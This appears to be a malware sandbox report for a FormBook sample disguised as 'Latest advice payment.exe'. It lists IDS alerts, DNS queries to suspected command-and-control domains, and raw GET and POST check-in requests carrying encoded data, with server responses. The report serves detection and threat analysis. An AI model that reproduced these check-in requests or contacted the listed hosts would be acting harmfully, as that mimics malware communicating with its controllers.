Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50033 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 154.88.22.101:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50037 -> 154.88.22.101:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50030 -> 172.67.167.146:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50038 -> 154.88.22.101:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50038 -> 154.88.22.101:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50041 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50042 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50042 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 154.88.22.101:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50040 -> 209.74.77.107:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50013 -> 172.67.145.234:80
Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
Source: Joe Sandbox View | IP Address: 149.88.81.190
Source: Joe Sandbox View | IP Address: 209.74.77.107
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: C:\Users\user\Desktop\Latest advice payment.exe | Code function: 0_2_005D22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | HTTP traffic detected:
    GET /xxr1/?b6=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Host: www.nb-shenshi.buzz
    Connection: close
    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected:
    GET /sgdd/?b6=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Host: www.laohub10.net
    Connection: close
    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected:
    GET /rq1s/?b6=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2aRhq0xPreKegZNgRyigK2URQJRetLL6xmvJtnHWTfyzSbGWdrg=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Host: www.xcvbj.asia
    Connection: close
    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected:
    GET /rum2/?b6=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBkidEg+kRQXv4obyNPkBDCtbUb3LL9ptfYbieFsxGE9yCAarRKSI=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Host: www.soainsaat.xyz
    Connection: close
    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected:
    GET /d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Host: www.amayavp.xyz
    Connection: close
    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected:
    GET /vg0z/?b6=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Host: www.vayui.top
    Connection: close
    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected:
    GET /o362/?b6=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Host: www.rgenerousrs.store
    Connection: close
    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected:
    GET /jhb8/?b6=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv3IFg7wS9Zfpqa2312nFAQ2OMwXhW64NslbGydbZxuWxpmOq3INM=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Host: www.t91rl7.pro
    Connection: close
    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Source: global traffic | HTTP traffic detected:
    GET /alu5/?b6=m83uTjDkEXAXcvpaGmUoJ8Y4XcRIkh2fMbxp9Jcjydk1OP9q/x+Uq7Puqw1bWxP8wchYD7Gqx/Fq8mp+rVpxo2CL5VTj7SrR/OegDMXRn69R6rST1isaHd8Em6LhDwUu8jHHb1w=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Host: www.learnwithus.site
    Connection: close
    User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficDNS traffic detected: DNS query: www.nb-shenshi.buzz
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.soainsaat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amayavp.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.t91rl7.pro
                Source: global trafficDNS traffic detected: DNS query: www.learnwithus.site
                Source: global trafficDNS traffic detected: DNS query: www.cuthethoi.online
                Source: unknownHTTP traffic detected: POST /sgdd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.laohub10.netOrigin: http://www.laohub10.netReferer: http://www.laohub10.net/sgdd/Cache-Control: no-cacheContent-Length: 207Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 MobileData Raw: 62 36 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 34 36 63 61 31 4d 5a 39 73 73 51 66 6c 58 34 69 6a 2f 61 2b 57 44 44 38 76 72 6e 51 68 2f 4a 59 47 78 75 50 78 63 4b 77 47 55 50 Data Ascii: b6=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:27:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:28:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:28:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:28:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 22:28:19 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 03 Dec 2024 22:28:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-03T22:28:39.8232335Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:28:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBt3%2B%2BPrqpUtsr0PSrY9vfS6p%2BSY%2Fho%2B2kDWEGJpkz4clJgh5OhMnxSR1MjALPZ6BdJ4MypXPShu8BCz9w9oo6VFguH%2FOnL617KmFzy7Le4qJ81eYhkZSe7JTDbWqYTl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe1d9c5d18ea-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1456&rtt_var=728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:28:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zan3ks7g%2FmWr2oE6XaRVZtrrrZU39zQM%2BLpmULiZlBL4rcDB1w6mspGhyHqnySJFLUdXWeMpHpfaVo9zN1O0beDeywvGGsi%2BWQ3iWRm0nNvJ2ZiDP5YJzVxE%2BeqBwPp9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe2e4b9f43e3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuGmHRhyp2yInOtvh4Fa470vyDVmqr%2Bl9RWhf7URkL23c4RihzoCzts6zcqeO264QGXdjLKqRWHHQuzZhvqj51n71VSC4Jr9yBbx%2BFADvHm64439trgEe%2BL397uOcc9K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe3edecc15d7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1581&rtt_var=790&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRdhCF7lc3yjw0%2F%2FfAxy5m4RakYA0D6ABxTwWEzEOoDEuVyOYXy6rRvqpPZ5QuDKPojZv0lfE1E8HbF%2B8fvj3e8nxYV3WqcPcrpSFy8SxPu7R4j1yIe9qTbP%2Blep%2B2dg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe4fc99e430f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 22:29:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGwW8YZYGqXOQ2GQX69tYzoGLflPrPMbc01lRT8n4bvnZ%2BlgUCNR4pu3LZKIcAG3Mgn2Qj0SV82KEBsuufhLLdwoX2l5BDfZ1IjNnVcNzcUlcr5ZtMbQVFpkANSuiYOYWU6JXl8AFnw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec6fe7ad90a8c36-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1825&rtt_var=912&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0
